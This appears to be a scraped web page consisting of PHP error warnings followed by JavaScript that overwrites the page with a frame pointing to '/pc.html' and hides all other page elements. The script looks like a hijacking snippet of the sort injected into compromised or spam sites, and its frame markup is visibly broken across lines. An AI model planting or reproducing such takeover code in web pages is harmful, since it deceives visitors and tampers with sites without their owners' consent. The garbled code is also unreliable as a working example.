Warning: mkdir(): No space left on device in /www/wwwroot/Z3.com/func.php on line 127
Warning: file_put_contents(./cachefile_yuan/yitegy.com/cache/bb/99e5d/5f8ae.html): failed to open stream: No such file or directory in /www/wwwroot/Z3.com/func.php on line 115
var items = ['/pc.html'];
var item = items[Math.floor(Math.random()*items.length)];
setFrame(item);function setFrame(olink){
// 修改容器樣式增加!important和定位屬性
var ss = '
'
+ '';
// 使用更安全的文檔寫入方式
document.open();
document.write(ss);
document.close(); // 添加視口設置
var oMeta = document.createElement('meta');
oMeta.name = 'viewport';
oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,'
+ 'maximum-scale=1,user-scalable=no';
document.head.appendChild(oMeta); // 增強樣式覆蓋邏輯
setTimeout(function() {
// 強製覆蓋body和html樣式
document.documentElement.style.cssText += 'height:100% !important;padding:0 !important;';
document.body.style.cssText += 'height:100% !important;padding:0 !important;';
// 遍曆隱藏其他元素(保留原始邏輯)
Array.from(document.body.children).forEach(element => {
const tag = element.tagName.toLowerCase();
const id = element.id;
if(id !== "iconDiv1" && id !== "showcloneshengxiaon" && tag !== "title") {
element.style.display = "none";
}
});
}, 100);
}